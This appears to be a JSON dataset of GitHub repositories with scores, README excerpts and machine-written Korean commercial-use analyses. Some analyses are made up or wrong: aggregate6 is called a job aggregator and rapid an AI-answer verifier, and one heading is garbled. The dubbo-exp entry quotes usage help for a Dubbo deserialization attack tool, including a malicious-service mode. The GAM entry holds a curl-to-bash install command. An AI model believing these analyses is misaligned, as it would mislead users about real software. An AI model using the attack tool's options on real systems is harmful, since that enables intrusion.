틀(템플릿)이라, 개발자들이 빠르게 서비스를 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신생 스타트업이 이 틀을 사용해 웹 기반 회계 관리 도구를 2주 내 출시\n2. **내부 업무 도구**: 중소기업","readme_excerpt":"# 🚂 generator-express-no-stress\n\n![](https://img.shields.io/badge/status-stable-green.svg) ![](https://img.shields.io/npm/v/generator-express-no-stress.svg) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/56c006ccc44c47f49d12b6b35fcf35da)](https://www.codacy.com/app/cdimascio/generator-express-no-stress?utm_source=github.com&utm_medium=referral&utm_content=cdimascio/generator-express-no-stress&utm_campaign=Badge_Grade) [![](https://img.shields.io/gitter/room/cdimascio-oss/community?color=%23eb205a)](https://gitter.im/cdimascio-oss/community) [![All Contributors](https://img.shields.io/badge/all_contributors-4-orange.svg?style=flat-square)](#contributors-) ![](https://img.shields.io/badge/license-MIT-blue.svg)\n\nCreate awesome [Express.js](http://www.expressjs.com) applications with best of breed tech including ES.next via [Babel.js](https://babeljs.io/), structured logging with [Pino](https://github.com/pinojs/pino), API validation and interactive documentation using an [Ope","composite_score":0.2225,"license_safety_tag":"safe"},{"name":"tidwall/evio","github_url":"https://github.com/tidwall/evio","stars":5,"language":"Go","license":"MIT","abandonment_months":0,"description":"# tidwall/evio 평가 분석\n\n## 왜 보물인가\n매우 적은 수의 관심(별 5개)으로 보아 아직 시장에서 발견되지 않은 숨겨진 기술이거나, 매우 틈새 분야의 전문 도구일 가능성이 높습니다.\n저장소명과 마지막 활동 시점(2026년 미래 날짜)을 볼 때 정보 신뢰성 검증이 필요합니다.\n\n## 어디에 쓸 수 '';나\n\n**1. 실시간 통신 SaaS 서비스","readme_excerpt":"**Due to recent spikes in bot activity, the Issues and Pull Requests tabs have been disabled. For priority support, contact me directly.**\n\n<p align=\"center\">\n<img \n    src=\"logo.png\" \n    width=\"213\" height=\"75\" border=\"0\" alt=\"evio\">\n<br>\n<a href=\"https://godoc.org/github.com/tidwall/evio\"><img src=\"https://img.shields.io/badge/api-reference-blue.svg?style=flat-square\" alt=\"GoDoc\"></a>\n</p>\n\n`evio` is an event loop networking framework that is fast and small. It makes direct [epoll](https://en.wikipedia.org/wiki/Epoll) and [kqueue](https://en.wikipedia.org/wiki/Kqueue) syscalls rather than using the standard Go [net](https://golang.org/pkg/net/) package, and works in a similar manner as [libuv](https://github.com/libuv/libuv) and [libevent](https://github.com/libevent/libevent).\n\nThe goal of this project is to create a server framework for Go that performs on par with [Redis](http://redis.io) and [Haproxy](http://www.haproxy.org) for packet handling. It was built to be the foundation","composite_score":0.2224,"license_safety_tag":"safe"},{"name":"iam-veeramalla/devsecops-demo","github_url":"https://github.com/iam-veeramalla/devsecops-demo","stars":202,"language":"TypeScript","license":"NOASSERTION","abandonment_months":15,"description":"","readme_excerpt":"","composite_score":0.2222,"license_safety_tag":"unknown"},{"name":"Microsoft/AirSim","github_url":"https://github.com/Microsoft/AirSim","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":2,"description":"# Microsoft/AirSim 분석\n\n## 왜 보물인가\n컴퓨터가 현실처럼 느끼는 가상 환경에서 드론과 자동차를 안전하게 테스트할 수 있는 시뮬레이션 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행차 개발 회사 SaaS**: 실제 도로 테스트 비용을 90% 절감하는 가상 시뮬레이션 서비스\n2. **드론 배송 업체 내부 도구**: 신규 배송 경로","readme_excerpt":"## Project AirSim announcement\r\n\r\nMicrosoft and IAMAI collaborated to advance high-fidelity autonomy simulations through Project AirSim—the evolution of AirSim— released under the MIT license as part of a DARPA-supported initiative.  IAMAI is proud to have contributed to these efforts and has published its version of the Project AirSim repository at [github.com/iamaisim/ProjectAirSim](https://github.com/iamaisim/ProjectAirSim).\r\n\r\n## AirSim announcement: This repository will be archived in the coming year \r\n\r\nIn 2017 Microsoft Research created AirSim as a simulation platform for AI research and experimentation. Over the span of five years, this research project has served its purpose—and gained a lot of ground—as a common way to share research code and test new ideas around aerial AI development and simulation. Additionally, time has yielded advancements in the way we apply technology to the real world, particularly through aerial mobility and autonomous systems. For example, drone del","composite_score":0.2221,"license_safety_tag":"unknown"},{"name":"stancl/tenancy","github_url":"https://github.com/stancl/tenancy","stars":5,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# stancl/tenancy 분석 보고서\n\n## 왜 보물인가\n여러 고객을 한 명의 관리자가 동시에 관리할 수 있는 기술로, SaaS 사업을 하려는 스타트업의 필수 기초 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 회계 관리 서비스**\n- 소규모 회계사무소가 여러 클라이언트의 재무 데이터를 별도로 분리·관리\n- 각 고객의 정보가 섞이지 않고","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://tenancyforlaravel.com\"><img width=\"800\" src=\"/art/logo.png\" alt=\"Tenancy for Laravel logo\" /></a>\n</p>\n\n<p align=\"center\">\n    <a href=\"https://laravel.com\"><img alt=\"Laravel 11.x\" src=\"https://img.shields.io/badge/laravel-10.x-red.svg\"></a>\n    <a href=\"https://packagist.org/packages/stancl/tenancy\"><img alt=\"Latest Stable Version\" src=\"https://poser.pugx.org/stancl/tenancy/version\"></a>\n    <a href=\"https://github.com/stancl/tenancy/actions\"><img alt=\"GitHub Actions CI status\" src=\"https://github.com/stancl/tenancy/workflows/CI/badge.svg\"></a>\n    <a href=\"https://github.com/stancl/tenancy/blob/3.x/DONATIONS.md\"><img alt=\"Donate\" src=\"https://img.shields.io/badge/Donate-%3C3-red\"></a>\n</p>\n\n<h1><a href=\"https://tenancyforlaravel.com\">Tenancy for Laravel &mdash; stancl/tenancy</a></h1>\n\n### *Automatic multi-tenancy for your Laravel app.*\n\nYou won't have to change a thing in your application's code.\n\n- :heavy_check_mark: No model traits to change","composite_score":0.222,"license_safety_tag":"safe"},{"name":"Eronana/rbush-3d","github_url":"https://github.com/Eronana/rbush-3d","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Eronana/rbush-3d 분석 보고서\n\n## 왜 보물인가\n3차원 공간에서 물체들의 위치를 빠르게 찾아내는 기술로, 게임·지도·물류 최적화 같은 현실의 많은 서비스에서 핵심 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발사 SaaS 플랫폼**\n게임 제작자들이 3D 게임에서 캐릭터 충돌이나 아이템 위치 감지를 쉽게 구현할 수 있는 클라","readme_excerpt":"RBush-3D\n=====\n\nRBush-3D is 3D version of [RBush](https://github.com/mourner/rbush).\n\n[![.github/workflows/ci.yml](https://github.com/Eronana/rbush-3d/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/Eronana/rbush-3d/actions/workflows/ci.yml)\n[![Coverage Status](https://coveralls.io/repos/github/Eronana/rbush-3d/badge.svg?branch=master)](https://coveralls.io/github/Eronana/rbush-3d?branch=master)\n\n![](./viz.png)\n\n## Install\n\nInstall with NPM: `npm install rbush-3d`\n\nOr use CDN links for browsers: https://app.unpkg.com/rbush-3d/files/dist/index.js\n\n## Usage\n\n### Creating a Tree\n\n```typescript\nimport { RBush3D } from 'rbush-3d';\nconst tree = new RBush3D();\n```\n\nAn optional argument to `RBush3D` defines the maximum number of entries in a tree node.\n`16` (used by default) is a reasonable choice for most applications.\nHigher value means faster insertion and slower search, and vice versa.\n\n```typescript\nconst tree = new RBush3D(16);\n```\n\n### Adding Data\n\nInsert an item:\n","composite_score":0.2219,"license_safety_tag":"safe"},{"name":"mikecao/umami","github_url":"https://github.com/mikecao/umami","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Umami 저장소 분석\n\n## 왜 보물인가\n웹사이트 방문자 통계를 간단하게 추적할 수 있는 개인정보 보호 친화적인 도구로, 복잡한 분석 서비스 대신 가볍고 빠른 대안을 찾는 사람들에게 필요합니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 블로거나 소상공인이 자신의 웹사이트 방문객 수와 행동을 실시간으로 모니터링하는 월 구독 분석 서비스\n\n**","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://content.umami.is/website/images/umami-logo.png\" alt=\"Umami Logo\" width=\"100\">\n</p>\n\n<h1 align=\"center\">Umami</h1>\n\n<p align=\"center\">\n  <i>Umami is a simple, fast, privacy-focused alternative to Google Analytics.</i>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://github.com/umami-software/umami/releases\"><img src=\"https://img.shields.io/github/release/umami-software/umami.svg\" alt=\"GitHub Release\" /></a>\n  <a href=\"https://github.com/umami-software/umami/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/umami-software/umami.svg\" alt=\"MIT License\" /></a>\n  <a href=\"https://github.com/umami-software/umami/actions\"><img src=\"https://img.shields.io/github/actions/workflow/status/umami-software/umami/ci.yml\" alt=\"Build Status\" /></a>\n  <a href=\"https://analytics.umami.is/share/LGazGOecbDtaIwDr/umami.is\" style=\"text-decoration: none;\"><img src=\"https://img.shields.io/badge/Try%20Demo%20Now-Click%20Here-brightgreen\" alt=\"Umami Demo\" /></a","composite_score":0.2214,"license_safety_tag":"safe"},{"name":"facebookresearch/Horizon","github_url":"https://github.com/facebookresearch/Horizon","stars":7,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# Horizon 저장소 분석\n\n## 왜 보물인가\nFacebook 연구팀이 만든 이 프로젝트는 머신러닝 모델을 더 똑똑하고 효율적으로 학습시키는 기술로, 대규모 데이터를 다루는 기업들에게 경쟁 우위를 제공합니다.\n\n## 어디에 쓸 수 있나\n**1. AI 모델 학습 SaaS 플랫폼**\n기업들이 자신의 데이터로 맞춤형 AI 모델을 빠르게 만들 수 있는 클라우드","readme_excerpt":"![Banner](logo/reagent_banner.png)\n\n### ReAgent is officially archived and no longer maintained. For latest support on production-ready reinforcement learning open-source library, please refer to [Pearl](https://github.com/facebookresearch/Pearl/) - Production-ready Reinforcement Learning AI Agent Library, by the Applied Reinforcement Learning team @ Meta.\n\n[![License](https://img.shields.io/badge/license-BSD%203--Clause-brightgreen)](LICENSE)\n[![CircleCI](https://circleci.com/gh/facebookresearch/ReAgent/tree/main.svg?style=shield)](https://circleci.com/gh/facebookresearch/ReAgent/tree/main)\n[![codecov](https://codecov.io/gh/facebookresearch/ReAgent/branch/main/graph/badge.svg)](https://codecov.io/gh/facebookresearch/ReAgent)\n---\n\n### Overview\nReAgent is an open source end-to-end platform for applied reinforcement learning (RL) developed and used at Facebook. ReAgent is built in Python and uses PyTorch for modeling and training and TorchScript for model serving. The platform contains w","composite_score":0.2213,"license_safety_tag":"safe"},{"name":"Teemu/pytest-sugar","github_url":"https://github.com/Teemu/pytest-sugar","stars":18,"language":"Python","license":"BSD-3-Clause","abandonment_months":5,"description":"# pytest-sugar 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 코드 검사 결과를 한눈에 이해할 수 있게 꾸며주는 도구로, 개발 생산성을 높이고 버그를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 개발팀을 위한 클라우드 기반 코드 검사 플랫폼으로, 회사의 소스코드 품질을 자동으로 모니터링하고 리포트를 제공합","readme_excerpt":"# pytest-sugar ✨\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/Teemu/pytest-sugar/build-and-test.yaml?branch=main)](https://github.com/Teemu/pytest-sugar/actions)\n[![PyPI Version](https://img.shields.io/pypi/v/pytest-sugar.svg)](https://pypi.org/project/pytest-sugar/)\n[![Downloads](https://img.shields.io/pypi/dm/pytest-sugar)](https://pypi.org/project/pytest-sugar/)\n![License](https://img.shields.io/pypi/l/pytest-sugar?color=blue)\n\nThis plugin extends [pytest](http://pytest.org) by showing failures and errors instantly, adding a progress bar, improving the test results, and making the output look better.\n\n![render1667890332624-min](https://user-images.githubusercontent.com/53298/200600769-7b871b26-a36a-4ae6-ae24-945ee83fb74a.gif)\n\n## Installation\n\nTo install pytest-sugar:\n\n    python -m pip install pytest-sugar\n\nOnce installed, the plugin is activated automatically. Run your tests normally:\n\n    pytest\n\nIf you would like more detailed output (one test per line","composite_score":0.2212,"license_safety_tag":"safe"},{"name":"RishabhK103/claude-code","github_url":"https://github.com/RishabhK103/claude-code","stars":84,"language":"","license":"NOASSERTION","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.221,"license_safety_tag":"unknown"},{"name":"jay0lee/GAM","github_url":"https://github.com/jay0lee/GAM","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# GAM 저장소 분석\n\n## 왜 보물인가\nGoogle Workspace(Gmail, 구글 드라이브 등) 관리를 자동화하는 도구로, 수천 개 계정을 일일이 관리하는 기업들의 시간과 비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 구글 계정 관리 플랫폼으로 구독 판매 (월 구독료 청구)\n2. **내부 업","readme_excerpt":"GAM is a command line tool for Google Workspace admins to manage domain and user settings quickly and easily.\n\n[![Build StatusM](https://github.com/GAM-team/GAM/actions/workflows/build.yml/badge.svg)](https://github.com/GAM-team/GAM/actions/workflows/build.yml)\n\n# Quick Start\n\n## Linux / MacOS\n\nOpen a terminal and run:\n\n```sh\nbash <(curl -s -S -L https://gam-shortn.appspot.com/gam-install)\n```\n\nthis will download GAM, install it and start setup.\n\n## Windows\n\nDownload the EXE Installer from the [GitHub Releases] page. Run it and you'll be prompted to setup GAM.\n\n## Use your own Python\nIf you'd prefer to install GAM as a Python package you can install with pip:\n```\npip install gam7\n```\n# Documentation\n\nThe GAM documentation is hosted in the [GitHub Wiki]\n\n# Mailing List / Discussion group\n\nThe GAM mailing list / discussion group is hosted on [Google Groups].  You can join the list and interact via email, or just post from the web itself.\n\n# Chat Room\n\nThere is a public chat room hosted i","composite_score":0.2209,"license_safety_tag":"safe"},{"name":"toptal/database_validations","github_url":"https://github.com/toptal/database_validations","stars":10,"language":"Ruby","license":"MIT","abandonment_months":2,"description":"# toptal/database_validations 분석\n\n## 왜 보물인가\n데이터베이스에 저장되는 정보가 정확한지 자동으로 검사해주는 도구로, 회사의 중요한 데이터 손상을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 정보를 다루는 클라우드 기반 업무 관리 플랫폼이 데이터 정확성을 보장하는 기능으로 판매\n2. ","readme_excerpt":"# DatabaseValidations\n\n[![CI](https://github.com/djezzzl/database_validations/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/djezzzl/database_validations/actions/workflows/ci.yml?query=branch%3Amaster)\n[![](https://badge.fury.io/rb/database_validations.svg)](https://badge.fury.io/rb/database_validations)\n\nDatabaseValidations helps you to keep the database consistency with better performance.\nRight now, it supports only ActiveRecord.\n\n*The more you use the gem, the more performance increase you have. Try it now!*\n\n## Installation\n\nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'database_validations'\n```\n\nAnd then execute:\n\n```bash\nbundle\n```\n\nOr install it yourself as:\n\n```bash\ngem install database_validations\n```\n\nHave a look at [example](example) application for details.\n\n## Benchmark ([code](benchmarks/composed_benchmarks.rb))\n\nImagine, you have `User` model defines as\n\n```ruby\nclass User < ActiveRecord::Base\n  validates :email, :full_name, uniquenes","composite_score":0.2206,"license_safety_tag":"safe"},{"name":"flyingmutant/rapid","github_url":"https://github.com/flyingmutant/rapid","stars":5,"language":"Go","license":"MPL-2.0","abandonment_months":1,"description":"# rapid 저장소 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 답변이 정말 정확한지 자동으로 검증해주는 도구로, 가짜 정보를 걸러내는 신뢰성 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 챗봇 SaaS**: AI 챗봇이 제시한 답변의 정확성을 자동으로 검증한 후 고객에게 제공\n2. **법무/컴플라이언스 내부 도구**: 기업의 법률 ","readme_excerpt":"# rapid [![PkgGoDev][godev-img]][godev] [![CI][ci-img]][ci]\n\nRapid is a Go library for property-based testing.\n\nRapid checks that properties you define hold for a large number\nof automatically generated test cases. If a failure is found, rapid\nautomatically minimizes the failing test case before presenting it.\n\n## Features\n\n- Imperative Go API with type-safe data generation using generics\n- Data generation biased to explore \"small\" values and edge cases more thoroughly\n- Fully automatic minimization of failing test cases\n- Persistence and automatic re-running of minimized failing test cases\n- Support for state machine (\"stateful\" or \"model-based\") testing\n- No dependencies outside the Go standard library\n\n*If you like rapid but are looking for a Rust alternative, check out\n[chaos_theory](https://github.com/flyingmutant/chaos_theory)*.\n\n## Examples\n\nHere is what a trivial test using rapid looks like ([playground](https://go.dev/play/p/QJhOzo_BByz)):\n\n```go\npackage rapid_test\n\nimport (\n\t","composite_score":0.2203,"license_safety_tag":"unknown"},{"name":"NetchX/Netch","github_url":"https://github.com/NetchX/Netch","stars":8,"language":"C#","license":"GPL-3.0","abandonment_months":1,"description":"","readme_excerpt":"# `In preparation for 2.0, this repository will be cleared of all 1.0 related releases and code`\r\n<p align=\"center\"><img src=\"https://github.com/NetchX/Netch/blob/main/Netch/Resources/Netch.png?raw=true\" width=\"128\" /></p>\r\n\r\n<div align=\"center\">\r\n\r\n# Netch\r\nA simple proxy client\r\n\r\n[![](https://img.shields.io/badge/telegram-group-green?style=flat-square)](https://t.me/netch_group)\r\n[![](https://img.shields.io/badge/telegram-channel-blue?style=flat-square)](https://t.me/netch_channel)\r\n[![](https://img.shields.io/github/downloads/netchx/netch/total.svg?style=flat-square)](https://github.com/netchx/netch/releases)\r\n[![](https://img.shields.io/github/v/release/netchx/netch?style=flat-square)](https://github.com/netchx/netch/releases)\r\n</div>\r\n\r\n## Features\r\nSome features may not be implemented in version 1\r\n\r\n### Modes\r\n- `ProcessMode` - Use Netfilter driver to intercept process traffic\r\n- `ShareMode` - Share your network based on WinPcap / Npcap\r\n- `TunMode` - Use WinTUN driver to creat","composite_score":0.2203,"license_safety_tag":"restricted"},{"name":"symfony/maker-bundle","github_url":"https://github.com/symfony/maker-bundle","stars":5,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# Symfony Maker Bundle 가치 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 반복적인 작업을 자동으로 처리해주는 도구로, 개발 속도를 크게 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 개발자용 생산성 도구**\n개발자들이 구독하는 클라우드 기반 개발 환경에 통합하여, 프로젝트 초기 구축 시간을 50%","readme_excerpt":"The Symfony MakerBundle\n=======================\n\nThe MakerBundle is the fastest way to generate the most common code you'll\nneed in a Symfony app: commands, controllers, form classes, event subscribers\nand more!\n\nDocumentation\n-------------\n\n[Read the documentation on Symfony.com][1]\n\nBackwards Compatibility Promise\n-------------------------------\n\nThis bundle shares the [backwards compatibility promise][2] from\nSymfony. But, with a few clarifications.\n\nA) The input arguments or options to a command *may* change between\n   minor releases. If you're using the commands in an automated,\n   scripted way, be aware of this.\n\nB) The generated code itself may change between minor releases. This\n   will allow us to continuously improve the generated code!\n\n[1]: https://symfony.com/doc/current/bundles/SymfonyMakerBundle/index.html\n[2]: https://symfony.com/doc/current/contributing/code/bc.html\n\n---\n\nBuild Documentation Locally\n---------------------------\n\nThis is not needed for contributing, but ","composite_score":0.2201,"license_safety_tag":"safe"},{"name":"threedr3am/dubbo-exp","github_url":"https://github.com/threedr3am/dubbo-exp","stars":14,"language":"Java","license":"unknown","abandonment_months":11,"description":"# dubbo-exp 저장소 분석\n\n## 왜 보물인가\n마이크로서비스 아키텍처의 핵심 통신 기술인 Dubbo의 보안 취약점을 악용하는 방법을 담은 저장소로, 기업의 내부 시스템 침투를 방어하거나 모의해킹 테스트를 수행하려는 조직에 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 감사 서비스**: 금융, 전자상거래 회사의 Dubbo 기반 시스템","readme_excerpt":"*工具仅用于安全研究以及内部自查，禁止使用工具发起非法攻击，造成的后果使用者负责*\n\n# Dubbo反序列化测试工具\n\n## 1. 编译&构建\n```\nmvn assembly:single\n```\n\n## 2. 使用帮助\n```\nusage: java -jar exp.jar [OPTION]\n- -h --help               帮助信息\n- -l --list             输出所有gadget信息\n- -g --gadget <arg>          gadget名称\n- -a --args <arg>      gadget入参，多个参数使用多次该命令传入，例-a http://127.0.0.1:80/ -a Calc\n- -p --protocol <arg>   [dubbo|http] 通讯协议名称，默认缺省dubbo\n- -s --serialization <arg>          [hessian|java] 序列化类型，默认缺省hessian\n- -t --target <arg>          目标，例：127.0.0.1:20880\n- -f --fastcheck <arg>   快速攻击检查（使用预置参数数据文件，遍历所有gadget进行攻击检查），参数为数据文件路径，参考文件check.data\n- -e --evil    恶意服务模式，也就是通过返回恶意序列化数据给客户端，从而攻击连接进来的服务\n- -evilHost <arg>    恶意服务ip\n- -evilPort <arg>    恶意服务port\n- -registry <arg>    [zookeeper]，暂时仅实现了攻击zookeeper，恶意服务模式下，攻击注册中心，控制客户端连接到本恶意服务，也就是通过返回恶意序列化数据给客户端，从而攻击连接进来的服务\n- -scheme <arg>      [auth|digest]，zookeeper认证类型\n- -username <arg>    [zookeeperUsername]，zookeeper认证账号\n- -password <arg>    [zookeeperPassword]，zookeeper认证密码，digest：要对passWord进行MD5哈希，","composite_score":0.2201,"license_safety_tag":"unknown"},{"name":"lzyzsd/JsBridge","github_url":"https://github.com/lzyzsd/JsBridge","stars":7,"language":"Java","license":"unknown","abandonment_months":12,"description":"# JsBridge 프로젝트 분석\n\n## 왜 보물인가\n웹사이트와 모바일 앱 사이의 통신을 쉽게 만들어주는 기술로, 더 빠르고 안정적인 앱 서비스 개발을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **금융 앱 SaaS**: 은행/증권사가 웹 기반 거래 화면을 모바일 앱에 빠르게 적용하는 데 사용\n2. **채팅/커뮤니티 플랫폼**: 웹에서 만든 기능을","readme_excerpt":"# JsBridge\n\n-----\n\nInspired and modified from [this](https://github.com/jacin1/JsBridge) and WeChat jsBridge file, with some bug fixes and feature enhancements.\n\nThis project makes a bridge between Java and JavaScript.\n\nIt provides a safe and convenient way to call Java code from JavaScript and call JavaScript code from Java.\n\n## How JsBridge Works\n![JsBridge](./JsBridgeWork.png)\n\n## Demo\n![JsBridge Demo](https://raw.githubusercontent.com/lzyzsd/JsBridge/master/JsBridge.gif)\n\n## Usage\n\n## JitPack.io\n\nI strongly recommend [JitPack.io](https://jitpack.io)\n\n```groovy\nrepositories {\n    // ...\n    maven { url \"https://jitpack.io\" }\n}\n\ndependencies {\n    compile 'com.github.lzyzsd:jsbridge:1.0.4'\n}\n```\n\n## Use it in Java\n\nAdd `com.github.lzyzsd.jsbridge.BridgeWebView` to your layout, it is inherited from WebView.\n\n### Register a Java handler function so that JavaScript can call\n\n```java\n\n    webView.registerHandler(\"submitFromWeb\", new BridgeHandler() {\n        @Override\n        public void","composite_score":0.2198,"license_safety_tag":"unknown"},{"name":"job/aggregate6","github_url":"https://github.com/job/aggregate6","stars":11,"language":"Python","license":"BSD-2-Clause","abandonment_months":2,"description":"# job/aggregate6 상용화 분석\n\n## 왜 보물인가\n여러 곳에서 흩어진 채용 정보를 한곳에 모아주는 도구로, 구인업체와 구직자의 시간과 비용을 동시에 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 채용담당자를 위한 월 구독형 '구인 정보 자동 수집 플랫폼' (여러 채용사이트를 일일이 확인할 필요 없음)\n2. **내","readme_excerpt":"[![Requirements Status](https://requires.io/github/job/aggregate6/requirements.svg?branch=master)](https://requires.io/github/job/aggregate6/requirements/?branch=master)\n[![Coverage Status](https://coveralls.io/repos/github/job/aggregate6/badge.svg?branch=master)](https://coveralls.io/github/job/aggregate6?branch=master)\n\naggregate6\n==========\n\naggregate6 will compress an unsorted list of IP prefixes (both IPv4 and IPv6).\n\nDescription\n-----------\n\nTakes a list of IPv6 prefixes in conventional format on stdin, and performs two\noptimisations to attempt to reduce the length of the prefix list. The first\noptimisation is to remove any supplied prefixes which are superfluous because\nthey are already included in another supplied prefix. For example,\n`2001:67c:208c:10::/64` would be removed if `2001:67c:208c::/48` was\nalso supplied.\n\nThe second optimisation identifies adjacent prefixes that can be combined under\na single, shorter-length prefix. For example, `2001:67c:208c::/48` and\n`2001:67c:2","composite_score":0.2196,"license_safety_tag":"safe"},{"name":"doctrine/event-manager","github_url":"https://github.com/doctrine/event-manager","stars":7,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# Doctrine Event Manager 분석\n\n## 왜 보물인가\n웹 애플리케이션의 여러 기능들이 서로 영향을 주지 않으면서도 자동으로 연동되도록 해주는 '신경계' 역할을 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 자동 알림 시스템**\n전자상거래 플랫폼에서 상품 구매 시 자동으로 주문 확인 메일, 배송 추적, 재고 감소 ","readme_excerpt":"# Doctrine Event Manager\n\n[![Build Status](https://github.com/doctrine/event-manager/workflows/Continuous%20Integration/badge.svg)](https://github.com/doctrine/event-manager/actions)\n[![Scrutinizer Code Quality](https://scrutinizer-ci.com/g/doctrine/event-manager/badges/quality-score.png?b=1.2.x)](https://scrutinizer-ci.com/g/doctrine/event-manager/?branch=1.2.x)\n[![Code Coverage](https://scrutinizer-ci.com/g/doctrine/event-manager/badges/coverage.png?b=1.2.x)](https://scrutinizer-ci.com/g/doctrine/event-manager/?branch=1.2.x)\n\nThe Doctrine Event Manager is a library that provides a simple event system.\n\n## More resources:\n\n* [Website](https://www.doctrine-project.org/)\n* [Documentation](https://www.doctrine-project.org/projects/doctrine-event-manager/en/latest/)\n* [Downloads](https://github.com/doctrine/event-manager/releases)\n","composite_score":0.2195,"license_safety_tag":"safe"},{"name":"firecracker-microvm/firecracker-containerd","github_url":"https://github.com/firecracker-microvm/firecracker-containerd","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# firecracker-containerd 상용화 분석\n\n## 왜 보물인가\n컴퓨터의 자원을 효율적으로 나누어 쓸 수 있는 기술로, 클라우드 서비스 제공업체들이 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 서버리스 함수 실행 서비스(마치 필요할 때만 작동하는 임차 컴퓨터처럼)를 저렴하게 제공\n2. **내부 업","readme_excerpt":"# firecracker-containerd\n\n[![BuildKite](https://badge.buildkite.com/aab4ae547d5e5079a5915522e8cdb18492349aef67aae5a8c5.svg?branch=main)](https://buildkite.com/firecracker-microvm/firecracker-containerd)\n[![GitHub Actions](https://github.com/firecracker-microvm/firecracker-containerd/actions/workflows/build.yaml/badge.svg)](https://github.com/firecracker-microvm/firecracker-containerd/actions)\n\nThis repository enables the use of a container runtime,\n[containerd](https://containerd.io), to manage\n[Firecracker](https://github.com/firecracker-microvm/firecracker) microVMs.\nLike traditional containers, Firecracker microVMs offer fast start-up and\nshut-down and minimal overhead.  Unlike traditional containers, however, they\ncan provide an additional layer of isolation via the KVM hypervisor.\n\nPotential use cases of Firecracker-based containers include:\n\n* Sandbox a partially or fully untrusted third party container\n  in its own microVM.  This would reduce the likelihood of\n  leaking secrets ","composite_score":0.2195,"license_safety_tag":"safe"},{"name":"OffchainLabs/arbitrum","github_url":"https://github.com/OffchainLabs/arbitrum","stars":11,"language":"","license":"unknown","abandonment_months":11,"description":"# Arbitrum 저장소 분석\n\n## 왜 보물인가\n블록체인 거래를 더 빠르고 저렴하게 처리하는 기술로, 암호화폐 거래소와 금융 서비스 회사들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 거래소를 운영하는 회사들에게 빠른 거래 처리 기술을 월 구독 형태로 제공\n2. **블록체인 기반 결제 API**: ","readme_excerpt":"# Arbitrum repository directory\nThis repository serves as an index to the most commonly used repositories within the organisation.\n\n## Common repositories\n- [Arbitrum Nitro](https://github.com/OffchainLabs/nitro/) - Nitro is the latest iteration of the Arbitrum technology\n- [Arbitrum Nitro Contracts](https://github.com/OffchainLabs/nitro-contracts/) - The core Arbitrum Nitro contracts deployed to the parent chain to host the rollup\n- [Arbitrum Classic](https://github.com/OffchainLabs/arbitrum-classic) - Old \"classic\" Arbitrum tech stack\n- [Arbitrum SDK](https://github.com/OffchainLabs/arbitrum-sdk) - A TypeScript library for client-side interactions with Arbitrum\n- [Arbitrum Developers Documentation](https://github.com/OffchainLabs/arbitrum-docs) - Public documentation for developers available [here](https://developer.arbitrum.io/)\n- [Arbitrum Tutorials](https://github.com/OffchainLabs/arbitrum-tutorials) - Tutorials and demos showing and explaining how to interact with Arbitrum\n","composite_score":0.2195,"license_safety_tag":"unknown"},{"name":"Polymer/tachometer","github_url":"https://github.com/Polymer/tachometer","stars":32,"language":"TypeScript","license":"bsd-3-clause","abandonment_months":11,"description":"# Polymer/tachometer 분석\n\n## 왜 보물인가\n웹 애플리케이션의 성능을 측정하고 시각화하는 도구로, 사용자 경험을 개선하려는 모든 디지털 서비스에 필수적인 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 협업 도구나 클라우드 서비스가 자신의 성능을 모니터링하고 사용자에게 성능 리포트를 제공하는 기능\n2","readme_excerpt":"# tachometer [![Build Status](https://github.com/Polymer/tachometer/actions/workflows/tests.yaml/badge.svg?branch=main)](https://github.com/Polymer/tachometer/actions/workflows/tests.yaml?query=branch%3Amain) [![NPM  package](https://img.shields.io/npm/v/tachometer.svg)](https://npmjs.org/package/tachometer)\n\n> tachometer is a tool for running benchmarks in web browsers. It uses repeated\n> sampling and statistics to reliably identify even tiny differences in runtime.\n\n###### [Install](#install) | [Usage](#usage) | [Why?](#why) | [Example](#example) | [Features](#features) | [Sampling](#sampling) | [Measurement modes](#measurement-modes) | 